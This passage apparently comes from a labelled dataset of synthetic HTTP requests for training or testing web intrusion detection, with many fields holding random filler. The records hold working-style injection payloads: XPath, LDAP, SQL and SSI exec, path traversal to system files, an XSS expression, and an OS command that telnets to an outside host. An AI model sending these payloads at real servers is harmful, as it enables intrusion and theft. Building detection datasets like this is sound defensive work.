Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 164.186.250.7
Cookie: ihleAeef=h5WjyVFoBhgA;nsrivr45s=742;osrp6=c9X_L0;hcevkfqttvmsita=e;mMirom7ijt=ipnhnMdrpxijnc
Cookie2: $Version="15"
Date: Mon, 25 Jan 10 21:05:38 GMT
ETag: "4DOTsaKeuKe20mWmkYac"
Expect: 100-continue
From: tmenra3@rdaoespvt.it
If-Modified-Since: Wed, 30 Sep 09 23:19:52 UTC
If-Unmodified-Since: Sun, 27 Dec 09 16:12:54 GMT
If-Match: "0svdxJhPSHo_wZyuYb"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 9.9
Pragma: oiWU9='C7lk'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM aWZiaDZzRWVmbzBldHg0YmNla3d0dGUybmVpb3locDRpZndvcg==
Range: 56699-901828,6-1585
Referer: http://lhq7ise.ch/tmat/ioveH.dll
TE: chunked;q=0.8
Trailer: Accept-Encoding
User-Agent: Mozilla/3.6 (compatible; nyae8; Linux i586; cDpsHdtsET)
UA-CPU: PowerPC
UA-Disp: 613,8082,8
UA-OS: Win98
UA-Color: color16
Via: 3.4 www.o3aeo7p.css
Transfer-Encoding: identity
Upgrade: nTt/9.5, zose/2.4, Rar7eI/3.2, sextda/4.5
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 60.122.216.106
X-Serial-Number: 163741114628927
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40921
Start - Id: 49574
class: XPathInjection
GET /rJqNCEiN/sotieyns/urVEe9kcHxvV7iP1T/pHJukl-YRw.mdb?0leqr4as2lle=etent%2FA8lpns%2FtC5e%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D32%5D+%7C++o%2FxZrsa%2FtakcE%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D703%5D++++or++++%27hhtc%27%3D%27&-fromFbgsound0.ucxKx=elr2cueevsethidldu HTTP/1.0
Host: 194.167.92.56
Connection: msXdhtf
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: oerS-rBimuW, bMateaj-ba, a-brt0Th, o-WpoogS
Cache-Control: no-cache
Client-ip: 27.25.46.254
Cookie: htutqianda=248623;bhe=itrhettffhm
Cookie2: $Version="6"
Date: Mon, 28 Jun 04 02:46:02 GMT
ETag: W/"BDMRBwNmUW7P.XXGn"
Expect: rrqenrnd
From: xAlQbr@oetAt.gov
If-Modified-Since: Wed, 09 Jul 08 08:23:29 GMT
If-Unmodified-Since: Fri, 27 Oct 06 07:16:09 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: eeftuo sfagt=srres
Authorization: NTLM Zjdzb3RzZWxoYWRyeWFrYVRla0RkZG8xZkYxc2VsZWxzaGlnMTJtdGV2bnRldGlp
Range: -351866,-996363,00-
Referer: /leea/ezhotoe.pdf
TE: chunked;q=0.7,gzip;q=0.4,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.5 (X11; U; Unix 6.2; fd-fg; rv:3.5.8) Gecko/78418916
UA-CPU: StrongARM
UA-Disp: 979,7479,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2073x766
Via: 6.4 144.180.153.142, 1.5 www.dy7xi.htm
Transfer-Encoding: identity
Upgrade: opGee/0.6, iij/9.1, thIez/8.7
Warning: 497 53.69.32.200 "2sutvHa56sEcoGpl" "Mon, 17 Oct 05 23:56:09 GMT"
X-Forwarded-For: 61.92.55.45
X-Serial-Number: 4750592519886658439
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49574
Start - Id: 38686
class: LdapInjection
GET /7Cj.y/rancuobd6isagrrioa/K@p/nLOasb1ryathtonds/sttndl/e8bohadbOf/kWcgj2D/ZoaCKkALH0PxM/open1Xt9wmochaNgDV.exe?Pfsn=dn%2BacceptdhEbleh%7E&_A@Nbl=054&aehea6iO=019&reesoghprt0hu=%29++%28%7C++++%28++cn%3D*o++++%27brien*++++%29%28mail+++%3D*o+++%27brien*++%29++++&ssjpanreSZlorlk=oztupdateaiten HTTP/1.1
Host: www.ehj5iehuwc.biz
Connection: keep-alive
Accept: text/xml, video/mpeg
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.6
Accept-Language: eif79be-sprhM8;q=0.4, mts2xe-i, Hh-kaTqte
Cache-Control: no-cache
Client-ip: 19.47.61.99
Cookie: TFVRuuedK_=27;Cu=dhE;zrh=Oimefaal8it:)eeyoRui;nhktnssaPFtr6=cTV
Cookie2: $Version="61"
Date: Fri, 08 Aug 08 23:56:21 CET
ETag: "EvxKQQHQRlpZyyner"
Expect: Nh7w=4aegcen;feoka
From: nTromT8u@pzcel.it
If-Modified-Since: Wed, 07 Nov 07 01:16:28 UTC
If-Unmodified-Since: Wed, 11 Apr 07 10:58:54 UTC
If-Match: *
If-None-Match: "WhfkO2Zn5cSngJUC2Qg"
If-Range: *
Max-Forwards: 6840
MIME-Version: 5.2
Pragma: nomesgt='nsbha5oe'
Proxy-Authorization: NTLM NW9uckk4bWZtaXRyMGFvemFoaXJZZWNoZW5jaWV5Zmxpc2EzYXNOZWVzNXM=
Authorization: Basic ZGJhc0ViYTp0STdzbg==
Range: -213510,08-017,5-
Referer: http://www.wtjhSs.fr/poedItda/tgotaL/fyehg8.exe
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/4.7 (Windows; U; Win98 0.7; oE-0e; rv:1.8.7) Gecko/49973800
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6318x7597
Via: xp7ts/8.6 www.rBeme1h.html, 0.0 46.178.138.131
Transfer-Encoding: gzip
Upgrade: s1i4r/2.1, mrhpoe/7.3, dua/2.5, lrn/6.4
Warning: 827 128.241.155.90 "rdxPrqmix" "Mon, 08 Aug 05 16:44:17 GMT"
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 7677444389981478018
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38686
Start - Id: 45480
class: PathTransversal
GET /smQ2f/ojNneaSn/4CzQ/l2p1DkLg9mx/gbmqfaee/6W@ZJ5x90pkOI-j.@h/2CwXOBJl.swf?OLM@rJebj-Tw=bn7eaGeith&Qh-aVg6.Ocopt=94&i9sbnsrie=tem&rndewbttatrb=d%3A%5Cwinnt%5Cboot.ini&anljIhdrdaiprql=%28td%27y&WZ9r6A2osotvl=t0ttt36ut4hzsneee&biAxryowdbsh4=azfLqYaG8g&ZXsock_streamThttp=ewonteom+&cyrxeg1Avici=NbhseeceEykijrex&le5apiciterr=ed0WU-U&qbdNbaSjtaed9=elcAUelocationt7Ln1a HTTP/1.0
Host: 113.130.123.24
Connection: close
Accept: video/quicktime;q=0.6, image/jpeg, image/gif
Accept-Charset: *
Accept-Encoding: *
Accept-Language: iaibqpe-m;q=0.2, v3umein-ttsro1oA, vAegnaH-ne7;q=0.1
Cache-Control: no-cache
Client-ip: 53.223.189.118
Cookie: secnicreeaost=tF;eeneruyhntdsr=yhae;hwo=4382169;SlE=OwaT0a1teameojoirt
Cookie2: $Version="01"
Date: Tue, 21 Mar 06 09:16:19 CET
ETag: W/"W713Ox7N6zc2eDF"
Expect: 100-continue
From: 9lho@aiRe.net
If-Modified-Since: Sat, 30 May 09 22:19:40 CET
If-Unmodified-Since: Thu, 16 Sep 04 12:26:43 GMT
If-Match: "4lGHrAzX1DOkcv1tr"
If-None-Match: "f1FQh7EwzZnLTMGpX8"
If-Range: "irkDjx-lcFV0EcG"
Max-Forwards: 682
MIME-Version: 5.0
Pragma: rifreml='AionTo'
Proxy-Authorization: Digest username="hesa"
Authorization: Basic YWVoaGlvZDpyY21iaWV0bw==
Range: 7-
Referer: /dohe/eweiwe1.pdf
TE: trailers
Trailer: Referer
User-Agent: cdhuIet9ahI8e
UA-CPU: x86
UA-Disp: 3626,740,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5163x468
Via: FTP/2.9 223.210.147.184, FTP/5.7 www.dgESoui.png, 7.6 www.bo3t0es.jpg
Transfer-Encoding: identity
Upgrade: drf/1.3, eoe/9.9
Warning: 126 www.bm57.shtml "tust8ovdsrl" "Tue, 15 Jan 08 10:20:10 CET"
X-Forwarded-For: 150.175.159.37
X-Serial-Number: 49844
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45480
Start - Id: 39047
class: LdapInjection
POST /irWkfrpbESk5FKAE/wp@k6ePKIN/XXQ99.nsf? HTTP/1.0
Content-Length: 208
Content-Language: nti65w1
Content-Encoding: compress
Content-Location: http://jertu.fr/tenfl/osur/32ae.txt
Content-MD5: VGdudGRhbG9zemtlMEVuNw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 07 Nov 06 20:04:17 CET
Host: www.bHAt34s3O.com
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-cyrillic, x-mac-cyrillic
Accept-Encoding: gzip;q=0.7, deflate, gzip;q=0.6
Accept-Language: ay-te;q=0.6, O-eaeed;q=0.7, o6s-lWuo;q=0.4, egn-le7aj, uo-z;q=0.0
Cache-Control: max-age=5
Cookie: wiieEeazente=dzx8E8G6i;hirhseaaipttAo=nedgnrrmodxhtebe;9497rNc6sae=n-5MFdM;opst2l=>cglo;LWDdBsvrYfu=nuQ52cL
Date: Sat, 23 May 09 07:29:50 UTC
ETag: W/"3cB9HlpJ4rG0odJ"
Expect: lthdpi
From: 3o15uvte@tLwYeep6e.cz
If-Unmodified-Since: Sun, 10 Aug 08 15:04:55 CET
If-Match: "yNzxsuUibc8-Pkge"
If-None-Match: *
If-Range: "-Gt5NG.BxIijq6uns0HS"
Max-Forwards: 6
MIME-Version: 6.9
Pragma: no-cache
Authorization: NTLM OHJwNnlpOGFpZXNhb2FhbXJldGRzZ3N2ZmlFZGFFbXJyZQ==
Referer: http://www.d8dh.de/yegntt.html
TE: deflate;q=0.9,gzip;q=0.4,trailers
Trailer: Referer
User-Agent: 32)(&(objectClass=k7A5)(|(sn    = nllo)(cn=u J*))
UA-Pixels: 3109x9976
Via: nut5/4.8 241.253.246.230, smi/0.0 www.ta6s.htm, ist/2.7 15.113.78.236
Transfer-Encoding: compress
Upgrade: Are/6.6, yyhe4a/3.0, 7eytto/3.0, joo2/5.9
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

alERrtnuet4=rhtacces&adtnfaet26eawEs=gega 3u21cnhlinkxo&cant2iaichtbro=tllvareci3stdin uoka&Ilp=624760743&sgfaJrAI=ar8b&Iotwnlea=65&t4di=AagBOsrunga&fe5aD5owhT= suW~basi&sLP1=hrh&helowLitR=%urlt5krc~cbH

End - Id: 39047
Start - Id: 47956
class: XSS
GET /islfuboihcewueremora/nqfcnte.nsf?tnxrsdrgrc=2586&MzzR=G+style%3Dleft%3Aexpression%28alert++++%28lnzg.oeQf%29%29 HTTP/1.0
Host: 61.184.61.190
Connection: keep-alive
Accept: */*
Accept-Charset: us-ascii, isiri-3342;q=0.9, isiri-3342, iso-10646-ucs-2;q=0.5
Accept-Encoding: 
Accept-Language: eohezk0t-fpre;q=0.4, ughhmkid-cEe, xeie-teoeYsl
Cache-Control: no-cache
Client-ip: 236.104.219.184
Cookie: ln=ent;en=a dNaaihuybfD;1scriptQjC8eB=:b
Cookie2: $Version="803"
Date: Tue, 28 Nov 06 17:37:11 UTC
ETag: "WEVlnkxAx84k3BG8N5"
Expect: 100-continue
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Thu, 19 Mar 09 01:06:02 UTC
If-Unmodified-Since: Wed, 20 Jun 07 09:51:48 GMT
If-Match: "U2xBj1dnM1BP8CcaB"
If-None-Match: "CRiilMO@fXgIVomv"
If-Range: *
Max-Forwards: 44
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: noVEdn roedY=desdiE
Authorization: NTLM aUFFYW9mbnl2aW5hOXhsZWNlcnN3bEkzdHphaW9RY2llaVhlZW8wemdycmVl
Range: -162,92-
Referer: /Ntih/pswnia/fTo6e/rsigornn.sh
TE: trailers,trailers
Trailer: Date
User-Agent: rlEiugu/6.1.7
UA-CPU: 68000
UA-Disp: 216,2039,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3364x532
Via: 2.7 108.124.36.83, 1.8 www.obreie.jpg:938, HTTP/1.8 www.xIote.tiff
Transfer-Encoding: identity
Upgrade: tco/6.7, yt2ien/0.1, jit/2.8, ect/0.5, ket1t/7.7
Warning: 644 www.h7jist.js:4 "esfqduza4efrwceom" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 91293701405226650926
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47956
Start - Id: 39891
class: SSI
GET /e5tA7ianost/t.J1rsMWeHvvGj1qEyj/EuidieqrcerrsAn6.msf?imiiiola=osAOiiwp-nnullbxpso&1l6srtoae=%3Bidlsslqsem+s HTTP/1.1
Host: 30.40.245.83
Connection: eeej7t
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: 3-0liGz8ee;q=0.9
Cache-Control: max-stale=59553
Client-ip: 244.32.83.55
Cookie: 3La=<!   #<!-- #exec cmd="id"-->
Date: Thu, 25 Oct 07 16:37:52 CET
From: hesirg7@ieucaapnt.de
If-Modified-Since: Mon, 17 Jan 05 06:21:50 CET
If-Match: *
If-Range: Thu, 22 Jan 09 19:15:58 CET
Max-Forwards: 8
Pragma: limdev='econtsrt'
Authorization: Digest cnonce="soibee6"
Referer: http://www.rewoe.com/aoLLr8ld/rtk2/rt9di/rahm/tooi.aspx
TE: trailers,deflate;q=0.4,trailers
Trailer: Pragma
User-Agent: rylheru8w
Via: 2.8 255.106.59.111:95, FTP/2.5 108.17.17.1:93131, 8.8 www.taectd5.html:8
Transfer-Encoding: h22z; adotlh0=oreo
Warning: 298 www.e7eu.gif "tun0ip5preqandnq" 
----: ----------------------------------------

null

End - Id: 39891
Start - Id: 39202
class: SSI
PUT /rxv7uFSt_oq9kb4/qXsdLzOs8NRT.gif? HTTP/1.0
Content-Length: 127
Content-Language: r,s,sg6ln
Content-Encoding: identity
Content-Location: /k1n4ca/ietnUyoo/ssaa6.gif
Content-MD5: NTJzZW5yZGhsaDBlbTIyaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Feb 07 11:50:07 UTC
Last-Modified: Sat, 03 Mar 07 18:05:22 UTC
Host: 18.209.174.33
Connection: close
Accept: application/*, audio/*, text/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 214.102.152.111
Cookie: at8UeamI=n%;tHrEdtofmnhsxnh=as;mdeunlts=8011793;Dj2Tt=9600849
Cookie2: $Version="690"
Date: Mon, 22 Sep 08 18:15:19 CET
ETag: W/"_bPK-Nwbl2.qlgL"
Expect: 100-continue
From: xxiea1au@lirimthobc.net
If-Modified-Since: Tue, 30 May 06 22:24:16 GMT
If-Unmodified-Since: Thu, 05 May 05 14:36:23 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 17 Mar 04 20:43:21 UTC
Max-Forwards: 8047
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: dlel tipu=gsey
Authorization: Basic b0Z3aHM6dHJmZGduc2U=
Range: -6444
Referer: http://ni1meoN.com/efhxlsT/7emee/na0Eh/tOrdtp.asmx
TE: trailers,deflate;q=0.9,trailers
Trailer: Proxy-Authorization
User-Agent: uJKFDob4 http://www.reethdlE.gov
UA-Disp: 375,7789,32
UA-Color: color16
UA-Pixels: 466x9263
Via: 3.0 www.ueiNo.tiff
Transfer-Encoding: oismac
Upgrade: rsq/5.8, einc/6.2, tohA/8.2, cdtd6/5.7
Warning: 774 www.u1nAt.tiff:5 "nuNymcpsqnfp7abDt" 
X-Forwarded-For: 113.114.213.108
X-Serial-Number: 4765226560917916
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

duycrFoihs67k=salfse&rt=1405976&likeZdq1I0kV6e=<!--#echo var="date_gmt"-->&uW6-APcY=t(g&wlomimp=ntpehyijrnttrDf

End - Id: 39202
Start - Id: 44679
class: PathTransversal
PUT /iw3Szv4Az.jcL6/KbshutdownyBiframeDsystem.asmx? HTTP/1.0
Content-Length: 104
Content-Language: 6,xtolhb,p
Content-Encoding: gzip
Content-MD5: OWFydHZwYnJodG91RXNuNg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 07 Apr 10 17:19:54 UTC
Host: www.reaae.gov
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: i4pe9t-gna, rndYp11v-lagoH, iiduveqe-y, nD-hnvnE;q=0.4
Cache-Control: max-age=87138
Client-ip: 153.69.134.128
Date: Fri, 21 Jan 05 07:50:30 UTC
From: EeA0y@doscaiun.org
Max-Forwards: 9
Pragma: kseLn2I='zlo'
Authorization: Digest uri=/erfozed/rwh2iE/i5ah9l.css
Referer: http://www.kcrPthM8.it/5eayat.jsp
User-Agent: Mozilla/5.9 (Windows; U; WinNT 9.4; ht-ml; rv:7.4.8) Gecko/94026580
----: -----------------

divIyHJfs=tfe4Tttebrte&hMrzwqhF_=ep&9cmoa5fenri=e&&XREv=doc(file:///c:/erzm/iSV.xml)

End - Id: 44679
Start - Id: 45597
class: PathTransversal
GET /5dRhmL2WHW/219OxG/scriptj5BtTh@S/egWgF8mY.vtdIMv6/oeAdp5myeth/.dOf_wp-child/TpinNgazrid4osr2aauR/gvaorinRc.shtml?moN=5%286ieEflhRePphpe&o8tnwheehe=onHuqE&.6cVu83ologI=0tDtk9cpEoKth&VN=document+6i0hsa1sjsi&aehmnm=re&Giya=7Wit1ayid%2Fdstwb&hg4r=md&cQe=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat&IeotrIaoov1n7i=i&9union.BwOm=7112 HTTP/1.0
Host: www.sjoh.com:521
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.7, euc-cn, x-mac-chinesetrad, iso-8859-1;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: pahIzDa=e6i98
Client-ip: 44.208.226.169
Cookie: oolx=ttorMxml ;aessbisoh4n=k
Cookie2: $Version="7"
Date: Sat, 17 Sep 05 07:55:51 UTC
ETag: W/"A4SSBwZMlSj3m58HF"
Expect: 100-continue
From: f4re3ea2@HiNl.uk
If-Modified-Since: Thu, 06 Sep 07 10:19:29 UTC
If-Unmodified-Since: Sun, 12 Nov 06 12:01:53 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 523
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: ench vu6n=5eeTe
Authorization: Digest cnonce="e4hha"
Range: -709
Referer: http://www.s5nbh.st/uEFiie/hpto/deArenc/tdtDt.ace
TE: gzip;q=0.7,gzip,trailers
Trailer: Accept
User-Agent: poti4yTQkniii2n
UA-CPU: 68000
UA-Disp: 6050,986,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1070x6656
Via: 2.5 29.134.24.8:2694
Transfer-Encoding: gzip
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 283 170.214.194.99 "oochsm" "Thu, 12 Feb 09 16:17:19 CET"
X-Forwarded-For: 204.138.194.99
X-Serial-Number: 90033234881
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45597
Start - Id: 43221
class: OsCommanding
GET /uqtod/d_4/f-L0d6dR/BscriptHEqnFwTetc/r1hO5pb9a-04vfJ./bDrhw.wk1Hj1twd.html?KiA2=%5C%22+++++%5C%3B%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+www.etiegeraol.com+++++01168+++++%3B&Oobbo=eysheroc0t&ay75rh=4562290&anehatanoooSttt=33375534 HTTP/1.0
Host: 214.16.119.171:80
Connection: cEroaal
Accept: application/postscript, application/zip
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 141.13.227.191
Cookie: 6hdrae7I=4036153164;vmtt=rhl8l';cwWnwbEg=3
Cookie2: $Version="492"
Date: Sun, 24 Dec 06 07:56:18 UTC
ETag: "vwwfk9ovLGa8IzJLe"
Expect: 100-continue
From: Odth@g78cnm.uk
If-Modified-Since: Fri, 24 Sep 04 24:45:06 UTC
If-Unmodified-Since: Wed, 27 Jan 10 09:11:49 CET
If-Match: "ZfzlTNiogMaFknCW1"
If-None-Match: *
If-Range: Fri, 31 Jul 09 14:00:06 CET
Max-Forwards: 229
MIME-Version: 7.1
Pragma: doas=uxoa
Proxy-Authorization: Digest opaque="sgaC"
Authorization: aitiEo b6dh=3hdrt
Range: 09265-8387
Referer: /Nllr/ststyde/hwetpnh/s62Todu.pdf
TE: trailers,deflate;q=0.6,deflate
Trailer: TE
User-Agent: tenrThn7 (t9H_8lWo-l; egMc3k7RkE; iB1yQWa1Y; mahazGi; pQG0ZcP)
UA-CPU: x86
UA-Disp: 1503,1276,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 476x125
Via: twm/1.6 www.auntsqe1.shtml
Transfer-Encoding: gzip
Upgrade: pIh6l/8.2, tEst/3.2
Warning: 633 195.113.214.10 "tse9mteOot6asnp" "Thu, 30 Jun 05 07:11:38 GMT"
X-Forwarded-For: 4.63.150.148
X-Serial-Number: 3512760212193
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43221
Start - Id: 38074
class: LdapInjection
GET /nwXLO@3-TJ6@.k-Hf/Tasnpteyksehjmtlez/ioz/eD/KJz3.msf?5Ovthtlgtyii=tdpJsrC&9o1yt=uGn%25xh%3Aec&ei3dsTstljb=%29++++%28%7C++++%28displayName%3Dhad*%29+%28name+%3D+had*+++%29%28mail%3Dhad*%29&c2lsi=406&owinquGuw5setXi=tswst+ue%3Bn%3Fuheli&uiFhBtO=hdQDK_vE7yf&2Whh=dt&h7lisnIsdulF3U=vfn4robjectnlsyu HTTP/1.1
Host: www.SatgewDtvM.de:80
Connection: mjss8
Accept: */*
Accept-Charset: iso-8859-3;q=0.2, x-mac-korean;q=0.2, iso-8859-6;q=0.0, windows-874;q=0.0
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-stale=4797
Client-ip: 43.210.102.87
Cookie: X-TUfd4MJv=libEsr;tums=hQvd9
Cookie2: $Version="57"
Date: Mon, 25 Sep 06 05:15:01 UTC
ETag: W/"D8v7C-3-pg8qmVMX1v"
Expect: 100-continue
From: zfmmsal@ymhqo.ch
If-Modified-Since: Mon, 26 Oct 09 16:20:08 CET
If-Unmodified-Since: Fri, 24 Mar 06 21:58:09 CET
If-Match: "3lCP@G4pS36nrLeA72yP"
If-None-Match: "RvaqxOEiQLE5AIs9AP"
If-Range: "FmJxizBZzLrlYbp@efNj"
Max-Forwards: 96
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic cm5pZXVqOmh0bXM=
Authorization: Basic dGpvZURvOnZmYXN1N20=
Range: 77-,76-
Referer: http://ctDks.fr/nOth/nhwo.avi
TE: trailers,deflate
Trailer: Accept-Language
User-Agent: Mozilla/0.2 (compatible; oABDa; SunOS sun4u; t8id)
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 0762x683
Via: eesaT9/1.2 www.iu4tgi.html, 9.6 www.I2srcoiS.jpeg
Transfer-Encoding: identity
Upgrade: he4tl/7.5, euo/6.5, etH/9.6, aci/2.2, oojhe/4.2
Warning: 290 www.isci.css:805 "iIseaaalda5ig" "Wed, 15 Oct 08 18:13:14 GMT"
X-Forwarded-For: 36.56.242.165
X-Serial-Number: 814494240740
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38074
Start - Id: 42112
class: SqlInjection
GET /Paz%uFDEvn2ftpg7netcat/TWEBshutdown1/apeeiarroR6tm/e4yR.php3?lde9a5eaNepr76q=%2Fgbh&lcda=%3B++++EXEC%28++++%27INS%27%2B%27ERT++++INTO++users+++++values%2844%2C%27l3%27%2C%27M1ft%27+++%29%29&es=r9-AvPfk HTTP/1.0
Host: www.bbi0rt3pa.it:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 139.71.160.209
Cookie: nrwnnlwow=neav3youlvayoo3Q
Cookie2: $Version="9"
Date: Sat, 03 Apr 04 01:28:39 GMT
ETag: "36ABV77V@jd_sdUj"
Expect: oeeEja9t=tncldfia;etnq3hno=qcai6udr
From: ri9it34@rxsle.fr
If-Modified-Since: Mon, 14 May 07 04:50:50 GMT
If-Unmodified-Since: Sat, 19 Aug 06 09:00:56 UTC
If-Match: "PE9nmEeB@c_lsX9O"
If-None-Match: "1hcSvu90ABX8mDmFjHC"
If-Range: Wed, 03 Oct 07 13:22:10 CET
Max-Forwards: 457
MIME-Version: 0.9
Pragma: NslsrH='er'
Proxy-Authorization: Digest uri=/wSot5/LjitAzt.php3
Authorization: NTLM cmVvQmlubGRvaXdkbnRjc3N5anN4cmFzbTZuZWJla2RzdW9hdQ==
Range: 80-3804,023297-91,09-
Referer: /teEftns.mspx
TE: trailers,chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.6 (X11; U; Solaris 1.2; oi-fu; rv:8.4.3) Gecko/39854295
UA-CPU: Sparc
UA-Disp: 7194,078,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 830x020
Via: 4.1 www.dhejc5e.jpeg, 0.4 202.238.59.67, HTTP/6.2 www.ilSdmbnH.html
Transfer-Encoding: deflate
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 310 236.101.41.30 "heS1" "Tue, 01 Aug 06 04:08:43 UTC"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 912151407
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 42112
Start - Id: 46229
class: PathTransversal
GET /objectB6rbN7TOxOjW5/HiSiedbdrsr7liDlb/OYOYxnN-linkCzFK/n01W1iUUTw/rouHanUjdVchVSHI-f/hiWeun58eeEi/ttiswc3utuuedy7l.tiff?shajtipy=orploetTvczieE&hg8jEdxot=%2Fetc%2Fhttpd%2Fhttpd.conf&lsc8enixtoui8=0+li%3F&554PUQt=982&rieobzioDEOrgi=dUt%270&8VoAV0=ly&foe2dee=tm2eakrIeie&aouc5leeioosb=mDe7lUh+cu+%240dtpreg&ieaCexn=ndwinnta%5CohtrNaehxo&clet1rh=uYvv1hVAj8o HTTP/1.0
Host: www.itoe.com
Connection: iAazxihS
Accept: application/*, application/*, audio/*
Accept-Charset: x-mac-japanese;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 55.147.217.219
Cookie: urotbmx=th~st;d3NHQ=5302077574;P5vjL=dnsyeaodd8=
Cookie2: $Version="374"
Date: Mon, 02 Oct 06 04:59:35 UTC
ETag: "yc9wTp277f0YoEdYK"
Expect: 100-continue
From: eftra@neleobejy.com
If-Modified-Since: Thu, 26 Nov 09 23:34:56 UTC
If-Unmodified-Since: Sat, 26 Nov 05 23:51:15 CET
If-Match: "YoXFiYUDbEk3So5"
If-None-Match: "sfVc1tpHw8kkgLGk"
If-Range: Sun, 22 Jun 08 23:13:17 GMT
Max-Forwards: 4
MIME-Version: 1.9
Pragma: ukSenif=nroiQ
Proxy-Authorization: sczoan Qaahstc=tldthrl
Authorization: Basic ZXNydTpwaW50
Range: 173-
Referer: http://www.umTfrt.net/ua8r/irois7nw/xaeea/ayt5.dll
TE: chunked;q=0.4
Trailer: Accept-Encoding
User-Agent: Mozilla/7.1 (Machintosh; U; PPC Mac OS X 9.1; ia-iw; rv:8.2.3) Gecko/62466424
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6581x3968
Via: 5.6 www.bnmsnhnr.html, 9.5 132.128.219.85:709, FTP/0.0 www.deorWbS.js
Transfer-Encoding: gzip
Upgrade: Sdb/4.1
Warning: 235 www.tpm0.css "YcngsoigutaasdemifSa" 
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46229
Start - Id: 45067
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.1
Host: www.qoee.org
Connection: close
Accept: application/*
Accept-Charset: x-mac-greek, gb2312, cp-932
Accept-Encoding: *
Accept-Language: yr-erhIyu;q=0.0, 9steihn-acr;q=0.4, crn-ionOaosC;q=0.3
Cache-Control: 8xeu=oorato
Client-ip: 4.109.212.12
Cookie: irnh6Oeks=rnmXdh;YRq@=Gvart-H;traas=pjteoaeia;nTitiEmin=s3hvngbsprnwi;catfr=pal7hIfrJja;tggimgT2whereDhtpassS4U=rr
Cookie2: $Version="628"
Date: Fri, 04 Dec 09 23:00:56 GMT
ETag: "qWUh9tHs4AaboJ3l"
Expect: z4wo
From: feeaptn@RiywlCee.net
